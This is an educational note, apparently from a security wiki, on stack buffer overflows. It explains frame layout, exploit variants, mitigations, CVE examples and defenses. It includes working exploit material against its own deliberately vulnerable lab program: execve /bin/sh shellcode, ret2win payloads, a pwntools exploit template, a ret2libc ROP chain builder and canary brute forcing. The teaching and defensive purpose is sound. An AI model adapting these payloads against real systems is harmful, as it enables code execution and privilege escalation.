Stack Buffer Overflow

Definition

A stack buffer overflow is the memory-corruption sub-class where a function's local buffer — a fixed-size array allocated on the call stack — receives more data than it has space for, so the write spills into adjacent stack memory. The overwritten memory typically includes other local variables, the saved frame pointer, and (most dangerously) the saved return address that controls where the function returns to. The class is the canonical entry point for binary-exploitation education because it makes every concept concrete: stack layout, return-address control, the gap between bug and exploit, the role of every modern mitigation.

Why it matters

The stack buffer overflow taught a generation of security researchers because all five questions of exploitation appear in one bug:

Where is the bug (the function with the unbounded write)?
What state can I corrupt (saved return address, locals, frame pointer)?
How do I redirect control (overwrite the return address)?
Where do I send execution (a controllable address — shellcode in 1996, a ROP gadget in 2026)?
How do I defeat the mitigations (canary, ASLR, DEP, CET) standing in the way?

Modern stack overflows in production C/C++ are rarer than they used to be: strcpy is fortified, compilers emit canaries by default, and ASLR is universal. But unbounded-write bugs still produce critical CVEs annually (CVE-2021-3156 / Sudo "Baron Samedit" was a heap-based overflow with the same root cause, a copy that ran past the end of its destination; the Linux kernel regularly ships fixes for stack-bounds bugs). More importantly, the stack overflow is the model from which every other memory-corruption exploitation pattern is taught: the layered mitigation-defeat reasoning (info leak → canary bypass → ROP chain → arbitrary execute) generalizes to heap overflows, UAF, and type confusion.

The class also matters as a teaching note because it surfaces three transferable senior facts:

Stack overflows are the most-mitigated bug class in computing history. Stack canaries, ASLR, DEP (non-executable stack and data pages), shadow stacks (Intel CET), pointer authentication (ARM PAC), Control Flow Integrity: almost the entire exploit-mitigation landscape was built to make this bug harder to exploit. The arms race is the history of binary defense.
Mitigation defeat is composable. No single modern mitigation stops exploitation alone; defeating each takes a separate primitive. A stack overflow exploit in 2026 typically chains an info leak (defeat ASLR + read the canary) with a ROP gadget chain (defeat DEP) with possibly a CET-aware control-flow target (defeat shadow stacks). The compositional reasoning is what makes binary exploitation an engineering discipline rather than a recipe.
strcpy is not the only sink. Beginners think "the bug is strcpy". The real bug is "any write whose length is not bounded by the destination size" — strcat, sprintf, gets, read with attacker-controlled length, hand-written copy loops, memcpy after integer overflow in length. Pattern-matching on function names misses real bugs.

This note assumes you have read memory-corruption. It is the deep-dive worked example of class 1 (stack-based corruption) from that note.

How it works

A typical x86-64 stack frame for a function with a local buffer looks like this (high addresses at top, stack grows downward toward low addresses):

HIGH ADDRESSES
   ┌──────────────────────────────┐
   │ caller's frame               │
   ├──────────────────────────────┤
   │ argument bytes (if > regs)   │
   ├──────────────────────────────┤
   │ return address  ◀───────────────── target of the overflow
   ├──────────────────────────────┤
   │ saved RBP (frame pointer)    │
   ├──────────────────────────────┤
   │ stack canary (if -fstack-protector enabled)  ◀── tripwire
   ├──────────────────────────────┤
   │ other local variables        │
   ├──────────────────────────────┤
   │ char buf[64]  ◀──────────────────── the buffer being overflowed
   │   (writes grow toward HIGH)  │
   └──────────────────────────────┘
LOW ADDRESSES

The mechanism reduces to 5 steps:

A function declares a fixed-size local buffer (e.g., char buf[64]). The buffer sits at the low end of the function's stack frame.
An unbounded write copies attacker-controlled data into the buffer, either because the length is not checked (strcpy(buf, attacker_input)) or because the length check is wrong (integer overflow, off-by-one, sign-confusion).
The write spills past the end of the buffer, climbing toward higher addresses through other locals, the saved frame pointer, and the saved return address.
When the function executes its ret instruction, the CPU pops what is now the overwritten return address into rip.
Execution continues at the attacker-controlled address. With no mitigations, this is shellcode placed on the stack; with modern mitigations, this is the start of a ROP chain pointing into gadgets from non-randomized regions, or a JIT-spray target, or an entry point in libc.
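The five steps above can be modeled without touching real memory. The following is a toy simulation, assuming a simplified frame of 64 buffer bytes, an 8-byte saved RBP, and an 8-byte return address with no padding, other locals, or canary. The helper names (make_frame, unbounded_copy, saved_return_address) and all addresses are hypothetical.

```python
import struct

BUF_SIZE = 64  # matches char buf[64] in the text

def make_frame(saved_rbp: int, ret_addr: int) -> bytearray:
    """Toy frame, lowest address first: buf | saved RBP | return address."""
    return bytearray(BUF_SIZE) + bytearray(struct.pack("<QQ", saved_rbp, ret_addr))

def unbounded_copy(frame: bytearray, data: bytes) -> None:
    """Model strcpy: copy up to the first NUL, append a NUL, never check BUF_SIZE."""
    end = data.find(b"\x00")
    src = (data if end == -1 else data[:end]) + b"\x00"
    src = src[:len(frame)]            # the toy frame is all the memory we model
    frame[:len(src)] = src

def saved_return_address(frame: bytearray) -> int:
    """Read the 8-byte little-endian return address stored above buf and saved RBP."""
    return struct.unpack_from("<Q", frame, BUF_SIZE + 8)[0]

frame = make_frame(saved_rbp=0x7FFFFFFFE450, ret_addr=0x401234)

unbounded_copy(frame, b"A" * 32)      # fits inside buf
print(hex(saved_return_address(frame)))   # 0x401234, unchanged

# 72 filler bytes cross buf and saved RBP; the next 3 bytes plus the copied NUL
# replace the low half of the return address.
unbounded_copy(frame, b"A" * (BUF_SIZE + 8) + b"\x56\x11\x40")
print(hex(saved_return_address(frame)))   # 0x401156, attacker-chosen
```

The second copy is the whole bug in miniature: nothing in unbounded_copy compares the source length with BUF_SIZE, so the bytes after offset 72 land in the slot that ret later consumes.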

A representative end-to-end example. The vulnerable program:

#include <stdio.h>
#include <string.h>

void greet(char *name) {
    char buf[64];
    strcpy(buf, name);                  // bug
    printf("Hello, %s\n", buf);
}

int main(int argc, char **argv) {
    if (argc < 2) return 1;
    greet(argv[1]);
    return 0;
}

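Compiled with all compiler and linker mitigations disabled (for didactic purposes). ASLR is a kernel setting rather than a build flag, so it must be disabled separately for the run if a hard-coded stack address is to work: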

gcc -m32 -fno-stack-protector -no-pie -z execstack -o vuln vuln.c

The classic 1996 exploit shape works: place shellcode at the start of the input, pad to the saved return address offset (nominally 64 buf bytes + 4-byte saved EBP = 68 bytes, though alignment padding and saved registers often push it higher; the payload below assumes a measured offset of 76), then write 4 bytes pointing to the stack address where the shellcode lives.

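# Approximate one-shot exploit against the unprotected binary.
# Assumes ASLR is off for this run and that 76 is the offset measured on your build.
./vuln "$(python3 -c '
import sys
# 23-byte Linux/x86 execve of /bin//sh
shellcode = b"\x31\xc0\x50\x68//sh\x68/bin\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80"
offset = 76                      # measured in gdb; varies with compiler and flags
padding = b"A" * (offset - len(shellcode))
ret_addr = b"\xff\xff\xff\xbf"   # placeholder: replace with the address of buf seen in gdb (little-endian)
sys.stdout.buffer.write(shellcode + padding + ret_addr)
')"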

The bug is not "strcpy is unsafe"; it is that the write length was not bounded by the destination size, and the saved return address sits in the path the write traverses.
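The payload layout used above is plain offset arithmetic, and it only works if every byte survives delivery through argv. A minimal sketch follows, assuming the 32-bit layout from the example; build_payload and unsafe_positions are hypothetical helper names, and the offset and addresses are placeholders rather than measured values.

```python
import struct

# Bytes that do not survive this delivery path: NUL ends the C string, and
# space, tab, and newline split an unquoted shell command substitution.
ARGV_UNSAFE = b"\x00 \t\n"

def build_payload(shellcode: bytes, offset: int, ret_addr: int) -> bytes:
    """shellcode | filler up to `offset` | 4-byte little-endian return address."""
    if len(shellcode) > offset:
        raise ValueError("shellcode does not fit before the saved return address")
    filler = b"A" * (offset - len(shellcode))
    return shellcode + filler + struct.pack("<I", ret_addr)

def unsafe_positions(payload: bytes) -> list:
    """Indexes of payload bytes that would be dropped or would split the argument."""
    return [i for i, byte in enumerate(payload) if byte in ARGV_UNSAFE]

placeholder_shellcode = b"\x90" * 23           # stand-in for real shellcode
payload = build_payload(placeholder_shellcode, offset=76, ret_addr=0xBFFFE4C0)
print(len(payload))                            # 80: 76 bytes of prefix + 4-byte address
print(unsafe_positions(payload))               # []: every byte survives

bad = build_payload(placeholder_shellcode, offset=76, ret_addr=0xBFFF0020)
print(unsafe_positions(bad))                   # [76, 77]: a space and a NUL in the address
```

Checking for unsafe bytes before running the exploit saves a debugging session: a target address containing 0x00 or 0x20 silently truncates or splits the argument, and the crash then looks like a wrong offset.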

Techniques / patterns

The first task of an exploit is locating the saved return address. Disassemble the vulnerable function (gdb vuln, then disas greet). Calculate the buffer's offset from rbp, then add 8 (the saved RBP on x86-64) to reach the saved return address. Cyclic-pattern helpers (Metasploit's pattern_create.rb, cyclic in pwntools) generate input in which every short window is unique, so the bytes found in the return slot after a crash give the exact offset.
pwntools is the standard toolkit for exploit development: a Python library plus CLI that handles process spawning, payload construction, byte-string packing, ROP chain building, and shellcode generation. ROPgadget and one_gadget are separate tools commonly used alongside it for gadget search. Senior exploit code is short and pwntools-shaped.
Modern stack overflows require a chain, not a single payload. The chain typically runs in three stages: (1) trigger an info-leak primitive (a separate bug, often an out-of-bounds read in a different code path, or a format-string vulnerability) to learn the stack canary, the libc base address, and the PIE base; (2) compute ROP gadget addresses at known offsets from the leaked libc base; (3) use the stack overflow to overwrite the saved return address with the address of the first ROP gadget, followed by the rest of the chain.
Identify the right ROP chain. ROPgadget --binary libc.so.6 enumerates available gadgets; one_gadget libc.so.6 finds "one-shot" gadgets that spawn a shell given a single jump. Modern libc one-gadgets have preconditions (specific register state); senior usage validates the preconditions match what the overflow leaves on the stack.
Defeat stack canaries with leak or brute force. A canary is a random value placed between local variables and the saved return address; the function's prologue stores it, the epilogue checks it, and __stack_chk_fail aborts on mismatch. Defeating: (a) leak the canary via a separate info-leak bug, which is the common path; (b) brute-force it one byte at a time against forking servers. Each child inherits the parent's canary because fork() without exec does not re-randomize it, so a crash-or-survive signal reveals each byte in at most 256 attempts. This only works where the canary stays the same between attempts.
Compiler warnings and -D_FORTIFY_SOURCE=3 flag many cases at build time. Static analysis catches many strcpy(buf, input) patterns where the destination is a known-fixed-size buffer. Senior code is built with both, and treats every warning as a finding.
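The offset-finding step described in the first technique can be sketched in pure Python. This is an illustrative reimplementation in the style of Metasploit's upper/lower/digit pattern, not the pwntools implementation (pwntools' cyclic uses a de Bruijn sequence instead); pattern_create and pattern_offset here are local helper names.

```python
from itertools import product
import string

MAX_PATTERN = 26 * 26 * 10 * 3   # number of bytes before triples start repeating

def pattern_create(length: int) -> bytes:
    """Return b'Aa0Aa1Aa2...' truncated to `length` bytes."""
    if length > MAX_PATTERN:
        raise ValueError("pattern would repeat; use a shorter length")
    out = bytearray()
    for up, lo, dg in product(string.ascii_uppercase,
                              string.ascii_lowercase,
                              string.digits):
        if len(out) >= length:
            break
        out += (up + lo + dg).encode()
    return bytes(out[:length])

def pattern_offset(value: int, width: int = 8, length: int = 1024) -> int:
    """Offset of the little-endian bytes of `value` in the pattern, or -1."""
    needle = value.to_bytes(width, "little")
    return pattern_create(length).find(needle)

pat = pattern_create(200)
print(pat[:9])                                   # b'Aa0Aa1Aa2'

# Pretend the crash showed these 8 bytes in the saved-return-address slot.
observed = int.from_bytes(pat[72:80], "little")
print(pattern_offset(observed))                  # 72
```

In a real session the observed value comes from the debugger (the register or stack slot holding the overwritten return address), and the recovered offset replaces the guessed padding length in the payload.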

Variants and bypasses

Stack-based corruption splits into 4 operational variants.

1. Classic return-address overwrite

The textbook case described above. Writes past the buffer to reach the saved return address. Requires: bug in a function that has a buffer, no canary or canary-bypass, knowledge of the return-address target. Largely defeated on modern systems by SSP + ASLR + DEP unless chained with other primitives.
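The phrase "chained with other primitives" comes down to address arithmetic once a leak exists. A sketch follows, assuming an x86-64 target, a frame of 64 buffer bytes followed directly by the canary, and a sink that copies raw bytes including NULs (read or memcpy style, not strcpy). Every offset in HYPOTHETICAL_OFFSETS is a placeholder; real values come from the target's exact libc build.

```python
import struct

PAGE_SIZE = 0x1000

# Placeholder symbol and gadget offsets; NOT taken from any particular libc.
HYPOTHETICAL_OFFSETS = {
    "puts": 0x80E50,
    "system": 0x50D70,
    "bin_sh": 0x1D8678,
    "pop_rdi_ret": 0x2A3E5,
    "ret": 0x29139,
}

def libc_base_from_leak(leaked_addr: int, symbol_offset: int) -> int:
    """Subtract the symbol's offset from its leaked runtime address."""
    base = leaked_addr - symbol_offset
    if base % PAGE_SIZE != 0:
        raise ValueError("base is not page-aligned; leak or offset is probably wrong")
    return base

def build_chain(canary: int, libc_base: int, offsets: dict, buf_size: int = 64) -> bytes:
    """filler | leaked canary | saved-RBP filler | pop rdi; '/bin/sh'; ret; system."""
    def q(value: int) -> bytes:
        return struct.pack("<Q", value)
    return (
        b"A" * buf_size
        + q(canary)                                # rewrite the canary with its own value
        + q(0)                                     # saved RBP, unused by this chain
        + q(libc_base + offsets["pop_rdi_ret"])    # load first argument register
        + q(libc_base + offsets["bin_sh"])
        + q(libc_base + offsets["ret"])            # extra ret to keep 16-byte alignment
        + q(libc_base + offsets["system"])
    )

base = libc_base_from_leak(0x7F1234580E50, HYPOTHETICAL_OFFSETS["puts"])
print(hex(base))                                   # 0x7f1234500000
chain = build_chain(0x1122334455667700, base, HYPOTHETICAL_OFFSETS)
print(len(chain))                                  # 112
```

The page-alignment check is a cheap sanity test: a computed base that is not page-aligned almost always means the wrong libc version or a misparsed leak.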

2. Frame-pointer overwrite (off-by-one)

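A common bug shape: the writable region extends exactly one byte past the end of the frame's locals, so the write changes only the low byte of the saved frame pointer. The function's own epilogue restores that corrupted value into rbp; when the caller later runs its own epilogue (leave; ret), rsp is loaded from the corrupted rbp and the caller's return address is fetched from wherever that points, which can be attacker-controlled memory such as the overflowed buffer. This requires that no canary sits between the buffer and the saved frame pointer. Subtle and historically widely exploited.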
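The effect of a one-byte overwrite is easiest to see as arithmetic. The sketch below assumes x86-64, a single NUL byte written over the least significant byte of the saved RBP, and a caller that ends with leave; ret (so it reads its return address from rbp + 8). The addresses are hypothetical.

```python
from typing import Optional

def off_by_one_nul(saved_rbp: int) -> int:
    """Saved RBP after a NUL byte replaces its low byte (little-endian)."""
    return saved_rbp & ~0xFF

def pivoted_return_slot(saved_rbp: int) -> int:
    """Address the caller's `ret` reads from: corrupted rbp + 8 (past the popped RBP)."""
    return off_by_one_nul(saved_rbp) + 8

def offset_in_buffer(saved_rbp: int, buf_addr: int, buf_size: int) -> Optional[int]:
    """Offset inside buf where the fake return address must sit, or None if it misses."""
    slot = pivoted_return_slot(saved_rbp)
    if buf_addr <= slot and slot + 8 <= buf_addr + buf_size:
        return slot - buf_addr
    return None

saved = 0x7FFFFFFFE450          # caller's frame pointer saved in the callee's frame
buf = 0x7FFFFFFFE3F0            # start of the callee's 64-byte buffer

print(hex(off_by_one_nul(saved)))           # 0x7fffffffe400
print(hex(pivoted_return_slot(saved)))      # 0x7fffffffe408
print(offset_in_buffer(saved, buf, 64))     # 24
```

Whether the pivoted slot lands inside the buffer depends entirely on the low byte of the original saved RBP, which is why this variant is reliable on some stack layouts and useless on others.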

3. Local-variable corruption (no return overwrite)

The write does not reach the saved return address, but corrupts an adjacent local variable: a function pointer, a security-decision flag, a length value used in a subsequent allocation. Exploitation uses the corrupted local for code execution or for the next memory-corruption primitive. Bypasses stack canaries entirely (the canary sits between locals and the return address, so in-frame corruption never crosses it). Stack-protector builds typically try to place arrays above scalar locals for this reason, so in practice the exposed targets are often other arrays or fields inside the same struct.
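A toy frame makes the canary blind spot concrete. The layout below is an assumption chosen for illustration (16-byte buffer, then a 4-byte is_admin flag, padding, canary, saved RBP, return address); real compilers may order locals differently.

```python
import struct

BUF = 16
FLAG_OFF = BUF            # uint32 is_admin directly above the buffer
CANARY_OFF = BUF + 8      # after the flag and 4 bytes of padding

def new_frame(canary: bytes) -> bytearray:
    """low -> high: buf[16] | is_admin | pad | canary | saved RBP | return address."""
    assert len(canary) == 8
    return (bytearray(BUF)
            + bytearray(struct.pack("<I4x", 0))
            + bytearray(canary)
            + bytearray(struct.pack("<QQ", 0x7FFFFFFFE450, 0x401234)))

def write_unchecked(frame: bytearray, data: bytes) -> None:
    """Copy data to the start of buf with no bounds check against BUF."""
    if len(data) > len(frame):
        raise ValueError("write exceeds the modeled frame")
    frame[:len(data)] = data

def is_admin(frame: bytearray) -> bool:
    return struct.unpack_from("<I", frame, FLAG_OFF)[0] != 0

def canary_intact(frame: bytearray, canary: bytes) -> bool:
    """What the epilogue check would conclude."""
    return bytes(frame[CANARY_OFF:CANARY_OFF + 8]) == canary

canary = b"\x00" + bytes(range(1, 8))       # fixed value for a repeatable demo

short = new_frame(canary)
write_unchecked(short, b"A" * BUF + b"\x01")      # one byte past the buffer
print(is_admin(short), canary_intact(short, canary))   # True True: flag flipped, no alarm

long_write = new_frame(canary)
write_unchecked(long_write, b"A" * 40)            # runs through the canary
print(canary_intact(long_write, canary))          # False: epilogue would abort
```

The one-byte write changes program behavior and returns normally, because the only value the epilogue inspects was never touched.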

4. Stack-allocated structure with embedded function pointer

A local C++ object on the stack with a vtable, or a local struct with callback function pointers. The overflow corrupts the vtable or the function-pointer field; the next call through it transfers control to attacker-chosen code. Same general approach as variant 3 but more reliable because the corrupted target is a control-flow primitive.

Impact

Ordered by typical real-world severity:

Arbitrary code execution in the vulnerable process. The canonical RCE outcome. If the process runs with elevated privileges (root, SYSTEM, kernel mode), the impact escalates accordingly.
Privilege escalation via setuid/setgid binaries. A stack overflow in a setuid-root program (sudo, passwd) or in a daemon running as root yields root with one bug. CVE-2021-3156 (Sudo Baron Samedit) is the recent canonical case of this impact, although its overflow was heap-based rather than stack-based.
Kernel privilege escalation. Stack overflow in a kernel ioctl handler or system call yields kernel-context code execution and full system compromise. Kernel space adds its own mitigations (SMEP, SMAP, KASLR), but kernel stack bugs still produce critical CVEs annually.
Denial of service via abort. Stack canary detection produces a controlled abort rather than silent corruption; canary-detected overflow is a DoS rather than an RCE. Net positive for defenders.
Information disclosure via out-of-bounds read on the stack. Some "stack overflow" CVEs are actually out-of-bounds reads (reading past the buffer rather than writing past it) that leak adjacent stack contents — canaries, saved registers, PIE base.

Detection and defense

Ordered by effectiveness:

Compile with -fstack-protector-strong (canary) plus -D_FORTIFY_SOURCE=3 (compile-time + runtime checks on glibc string/memory operations; takes effect only when optimization is enabled). The first-line defense. Canaries detect the classic return-overwrite shape; FORTIFY_SOURCE flags some strcpy-family calls into known-fixed-size destinations at compile time and replaces the rest with size-checked variants that abort at runtime.
Compile with -fPIE -pie -fcf-protection=full and link with -Wl,-z,now -Wl,-z,relro. PIE (Position Independent Executable) together with ASLR randomizes the binary's load address, so an attacker must defeat ASLR to learn gadget addresses. -fcf-protection=full emits code compatible with Intel CET (hardware shadow stack and indirect-branch tracking), which defeats most ROP chains where the CPU and OS actually enforce it. RELRO with immediate binding marks the GOT read-only after relocations, defeating GOT-overwrite primitives.
AddressSanitizer in development and CI. gcc/clang -fsanitize=address instruments every memory access. Catches stack-buffer-overflow at the moment of the bug rather than at the eventual crash point, with full stack trace. The development-time complement to the production mitigations above. See memory-corruption §Detection-and-defense.
Fuzzing every input parser. Coverage-guided fuzzing (libFuzzer, AFL++) finds stack overflows by exploring code paths until something crashes. Combined with ASAN, the bug is reported at the precise source line. Industry standard for browsers, OS components, network protocols.
ARM Pointer Authentication (PAC) on supported hardware. ARMv8.3+ feature: return addresses are signed with a per-process key before being saved to the stack and verified before use. A corrupted return address fails the verification and the CPU traps. Apple A12+ ships with PAC enabled; Android Pixel devices use it; servers are increasingly enabling it.
Modern toolchain defaults catch many cases automatically. On distributions that harden their compiler defaults (Ubuntu is one example), GCC -O2 with no extra flags already enables stack canaries on functions with character buffers, fortifies string functions, and emits CET-aware code. Even unattended code gets meaningful baseline protection, but check what your own toolchain actually enables rather than assuming it.
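Whether a given binary actually received these protections can be checked from its ELF headers. The following is a minimal sketch for little-endian ELF64 files only, written against the ELF header layout rather than any library; elf64_mitigations is a hypothetical helper name. It reports three coarse signals and deliberately omits canary detection and the full-versus-partial RELRO distinction, both of which need the symbol and dynamic tables.

```python
import struct

ET_DYN = 3                    # shared object or PIE executable
PT_GNU_STACK = 0x6474E551
PT_GNU_RELRO = 0x6474E552
PF_X = 0x1                    # segment is executable

def elf64_mitigations(data: bytes) -> dict:
    """Coarse mitigation flags read from an ELF64 little-endian image."""
    if data[:4] != b"\x7fELF" or data[4] != 2 or data[5] != 1:
        raise ValueError("expected a little-endian ELF64 image")
    (e_type,) = struct.unpack_from("<H", data, 16)
    (e_phoff,) = struct.unpack_from("<Q", data, 32)
    e_phentsize, e_phnum = struct.unpack_from("<HH", data, 54)

    nx_stack = False          # stays False if no PT_GNU_STACK header is present
    relro = False
    for index in range(e_phnum):
        p_type, p_flags = struct.unpack_from("<II", data, e_phoff + index * e_phentsize)
        if p_type == PT_GNU_STACK:
            nx_stack = not (p_flags & PF_X)
        elif p_type == PT_GNU_RELRO:
            relro = True
    # ET_DYN is also the type of ordinary shared libraries, so "pie" is only
    # meaningful when the input is known to be an executable.
    return {"pie": e_type == ET_DYN, "nx_stack": nx_stack, "relro": relro}
```

A typical call would be elf64_mitigations(open("./vuln", "rb").read()); for the lab binary built with -no-pie, the "pie" entry should come back False.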

What does not work as a primary defense

"We use strncpy instead of strcpy." strncpy does not null-terminate when truncating; many strncpy users introduce a new bug (missing terminator → subsequent reads run off the end). Use strlcpy (BSD) or snprintf(dest, sizeof(dest), "%s", src) instead, and verify the result is what you expected.
"We checked the length before calling strcpy." Common pattern: if (strlen(input) < sizeof(buf)) strcpy(buf, input);. strlen walks until null; if input is not null-terminated, the check itself reads out of bounds. Fix is strnlen with an upper bound, or use a size-bounded copy unconditionally.
"This function isn't called from untrusted input." Code grows. The function that was internal-only in 2018 is called from a network handler in 2024. Defense in depth assumes the boundary will move.
"Stack canaries make this safe." Canaries detect contiguous overwrites that reach the saved frame pointer or return address; they do not detect adjacent-local-variable corruption (variant 3 above), writes that jump over the canary (for example through an attacker-controlled array index), or overwrites made after the canary value has leaked. Layered mitigations are the answer; canaries alone are not.

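The limits of a canary on a forking server can be shown with a small model. The sketch below assumes the attacker can overwrite the canary one prefix at a time and can tell whether the child crashed; ForkingServerModel is a hypothetical stand-in for a real service, not an attack tool.

```python
class ForkingServerModel:
    """Toy server: every child shares the parent's canary, as after fork() without exec."""

    def __init__(self, canary: bytes):
        self._canary = canary
        self.attempts = 0

    def child_survives(self, guess_prefix: bytes) -> bool:
        """True if overwriting the first len(guess_prefix) canary bytes leaves it unchanged."""
        self.attempts += 1
        return self._canary.startswith(guess_prefix)

def brute_force_canary(server: ForkingServerModel, size: int = 8) -> bytes:
    """Recover the canary one byte at a time using the crash-or-survive signal."""
    known = b""
    for _ in range(size):
        for candidate in range(256):
            if server.child_survives(known + bytes([candidate])):
                known += bytes([candidate])
                break
        else:
            raise RuntimeError("no byte matched; the canary changed between attempts")
    return known

server = ForkingServerModel(bytes.fromhex("00a1b2c3d4e5f607"))
recovered = brute_force_canary(server)
print(recovered.hex())            # 00a1b2c3d4e5f607
print(server.attempts <= 8 * 256) # True: at most 2048 tries, not 2**64
```

The search is linear in the number of bytes because each byte is confirmed independently. A server that re-executes itself for every connection gets a fresh canary each time and falls into the RuntimeError branch of this model.
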
Practical labs

Run only against owned lab environments. The labs use intentionally vulnerable code; do not deploy.

// Lab 1 — Minimal target. Save as vuln.c.
#include <stdio.h>
#include <stdlib.h>   // system()
#include <string.h>
void win(void) { puts("win() called"); system("/bin/sh"); }
void greet(char *name) {
    char buf[64];
    strcpy(buf, name);
    printf("Hi %s\n", buf);
}
int main(int argc, char **argv) {
    if (argc > 1) greet(argv[1]);
    return 0;
}

# Lab 1 (cont.) — Build with mitigations OFF and find the offset to the saved RIP.
gcc -fno-stack-protector -no-pie -O0 -g -o vuln vuln.c
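# Generate a cyclic pattern to identify the exact return-address offset:
python3 -c "from pwn import cyclic; import sys; sys.stdout.buffer.write(cyclic(200))" > input.bin
# greet() reads argv[1], so pass the pattern as an argument (not on stdin).
# On x86-64 the fault happens at `ret` on a non-canonical address, so rip never
# takes the pattern value; read the 8 bytes at the top of the stack instead.
gdb -q -batch -ex run -ex "x/gx \$rsp" --args ./vuln "$(cat input.bin)"
# Feed the low 32 bits of that value to cyclic_find() to learn the offset
# (0x61616173 is only an example; substitute what you observed):
python3 -c "from pwn import cyclic_find; print(cyclic_find(0x61616173))"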
# Output: the offset where saved RIP begins. Use this in the exploit.

# Lab 2 — Ret2win: overwrite saved RIP to jump to win().
WIN_ADDR=$(objdump -t ./vuln | awk '/ win$/ {print "0x"$1}')
OFFSET=72   # from Lab 1; will vary on your build
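python3 -c "
import sys
from struct import pack
# argv strings cannot carry NUL bytes and strcpy stops at the first NUL, so drop
# the zero high bytes of the address. The terminator written by strcpy and the
# zero high bytes already in the saved return address (non-PIE build) complete it.
addr = pack('<Q', ${WIN_ADDR}).rstrip(b'\x00')
payload = b'A'*${OFFSET} + addr
sys.stdout.buffer.write(payload)
" > exploit.bin
./vuln "$(cat exploit.bin)"
# Expected: 'win() called' and a shell, demonstrating saved-RIP control.
# If it prints the message and then crashes inside system(), the stack is likely
# misaligned by 8 bytes; returning just past the initial push in win() is a common workaround.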

# Lab 3 — Re-build with stack canary; observe canary detection.
gcc -fstack-protector-strong -no-pie -O0 -g -o vuln_canary vuln.c
./vuln_canary "$(cat exploit.bin)"
# Expected: '*** stack smashing detected ***: terminated'.
# The exploit primitive (return-address overwrite) is unchanged; the canary check turns RCE into DoS.

# Lab 4 — ASAN catches the bug at the moment of corruption, with full trace.
gcc -fsanitize=address -O0 -g -o vuln_asan vuln.c
./vuln_asan "$(python3 -c 'print("A"*200)')"
# Expected: ASAN output:
#   ==XXXX==ERROR: AddressSanitizer: stack-buffer-overflow
#   WRITE of size N at 0x... thread T0
#   ...
# Points at the strcpy call in greet(). The CI version of this catch is the standard development control.

# Lab 5 — Inspect the compiler-emitted mitigation primitives.
gcc -O2 -fstack-protector-strong -fcf-protection=full -c vuln.c -o vuln.o
objdump -d vuln.o | head -60
# Expected: function prologue loads %fs:0x28 (the canary), prologue stores it
# to the stack, epilogue compares and calls __stack_chk_fail if changed.
# `endbr64` instructions appear at indirect-branch targets (CET ENDBRANCH).

# Lab 6 — pwntools end-to-end exploit (templated).
cat > exploit.py <<'EOF'
from pwn import *
context.binary = elf = ELF("./vuln")
WIN = elf.symbols["win"]
OFFSET = 72                              # from cyclic-find in Lab 1
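payload = b"A" * OFFSET + p64(WIN).rstrip(b"\x00")   # argv cannot hold NUL bytes; strcpy writes the terminator
io = process([elf.path, payload])        # pass bytes directly so no text encoding alters them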
io.interactive()
EOF
python3 exploit.py
# Standard pwntools shape. Every exploit you'll write later starts from this template.

Practical examples

CVE-2021-3156 (Sudo "Baron Samedit"). Heap-based buffer overflow in Sudo's handling of backslash-escaped command-line arguments; strictly a heap bug, included here because the root cause is the same unbounded copy. The bug had existed since 2011 and shipped in essentially every Linux distribution. Despite ASLR, stack canaries, and PIE, an attacker who can run sudoedit locally gets root. Demonstrates that mature, widely-audited code (Sudo) is not immune.
OpenSSH pre-auth memory-corruption bugs (historical: CVE-2003-0693 et al.). Several historical OpenSSH bugs allowed remote attackers to corrupt memory before authentication (CVE-2003-0693 itself was a buffer-management flaw affecting the heap rather than the stack). Bugs of this kind are the motivation for privilege separation: modern OpenSSH runs separate privileged and unprivileged processes specifically to limit the blast radius of any remaining bug of this class.
Linux kernel stack overflows in legacy filesystem drivers. Crafted filesystem images can overflow stack buffers in kernel filesystem drivers, yielding kernel-context code execution. The reason "do not mount untrusted disks" is repeated advice even in 2026.
CTF-grade ret2libc / ret2csu chains. Standard category in Pwn CTFs: stack overflow + libc base leak via printf format-string bug + ret2csu gadget chain to call system("/bin/sh") despite ASLR + DEP + canary. The teaching pattern that distills the entire modern-mitigation-defeat curriculum.
CI catches the bug pre-deploy. A new image-parsing library is added to a microservice. The team's mandatory fuzzing CI (libFuzzer + ASAN) finds a stack overflow in 12 seconds of fuzzing on the new code. The bug never reaches production. This is the modal real-world outcome for organizations that invest in instrumentation.

Related notes

memory-corruption — the parent class this note specializes; read first if not done.
exploit-mitigations — the layered defenses that defeat the simple form of this bug and force exploit chaining.
CIA triad — stack overflow is a textbook integrity failure (program state changed without authorization) that enables further breaches.
Attacker-Defender Duality — the duality is especially visible in stack-overflow history: every offensive technique produced a corresponding defensive mitigation.
EDR / process correlation — modern EDR catches many ROP-based exploitation attempts via control-flow anomalies.
Windows Privilege Escalation — kernel stack overflows are one of the listed privesc primitives in that note; the bug class spans user-space and kernel-space.

Suggested future atomic notes

rop-and-ret2libc — the technique stack-overflow exploits use once DEP makes stack-shellcode impossible.
aslr-pie-and-info-leak-chains — the information-leak primitives needed to defeat ASLR before a ROP chain can land.
stack-canaries-and-shadow-stacks — how SSP and Intel CET shadow stacks work mechanically.
format-string-bugs — the canonical info-leak primitive paired with stack overflows in CTF and real-world chains.
off-by-one-and-frame-pointer-overwrite — variant 2 deep dive.
pwntools-exploit-development-patterns — the toolkit-level practice note.
fuzzing-with-libfuzzer-and-afl — the discovery side of the defender pair (paired with memory-corruption §Practical-labs Lab 5).
detect-stack-overflow-exploitation — defender-side playbook pair.

References

Foundational: Aleph One — Smashing the Stack for Fun and Profit (Phrack 49, 1996) — http://phrack.org/issues/49/14.html
Research / Deep Dive: Dennis Andriesse — Practical Binary Analysis (No Starch Press, 2018) — chapters on stack-based exploitation and modern mitigations
Official Tool Docs: pwntools — https://docs.pwntools.com/
Research / Deep Dive: Intel — Control-flow Enforcement Technology (CET) specification — https://software.intel.com/sites/default/files/managed/4d/2a/control-flow-enforcement-technology-preview.pdf

Reference system